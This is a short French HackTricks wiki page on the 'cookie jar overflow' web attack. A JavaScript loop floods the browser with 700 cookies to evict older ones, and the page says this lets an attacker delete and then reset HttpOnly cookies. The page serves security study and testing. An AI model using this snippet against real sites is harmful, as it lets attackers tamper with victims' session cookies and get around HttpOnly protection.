Cookie Jar Overflow

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge AWS de HackTricks)!

D'autres façons de soutenir HackTricks :

Les navigateurs ont une limite sur le nombre de cookies qu'ils peuvent stocker pour une page. Ainsi, si pour une raison quelconque vous devez faire disparaître un cookie, vous pouvez déborder le bocal à cookies car les plus anciens seront supprimés en premier :

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Remarquez que les cookies tiers pointant vers un domaine différent ne seront pas écrasés.

Cette attaque peut également être utilisée pour écraser les cookies HttpOnly car vous pouvez le supprimer puis le réinitialiser avec la valeur souhaitée.

Consultez ceci dans cet article avec un laboratoire.

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres façons de soutenir HackTricks:

Last updated